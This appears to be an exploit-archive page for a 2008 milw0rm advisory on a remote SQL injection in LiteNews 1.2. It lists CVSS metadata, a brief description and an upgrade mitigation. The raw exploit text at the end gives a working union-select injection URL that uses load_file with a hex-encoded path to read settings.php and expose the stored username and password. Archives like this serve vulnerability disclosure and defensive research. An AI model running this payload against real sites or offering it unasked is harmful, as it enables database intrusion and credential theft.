header-logo
Suggest Exploit
vendor:
LiteNews
by:
milw0rm.com
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: LiteNews
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:litenews:litenews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

litenews-01 <= 1.2 Remote sql injection

LiteNews version 1.2 is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of LiteNews.
Source

Exploit-DB raw data:

litenews-01 <= 1.2 Remote sql injection
# Download   : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
#                                                                                   #
#Injection Adress :  http://Sitename/litenew//index.php?mode=view&id=   code sql

you need to crypt the directory of settings.php with hex for see the user and password in line 16 & 17

C:\AppServ\www\litenew\settings.php = 0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870

http://Sitename/litenew//index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870),3,4,5/*

# milw0rm.com [2008-08-05]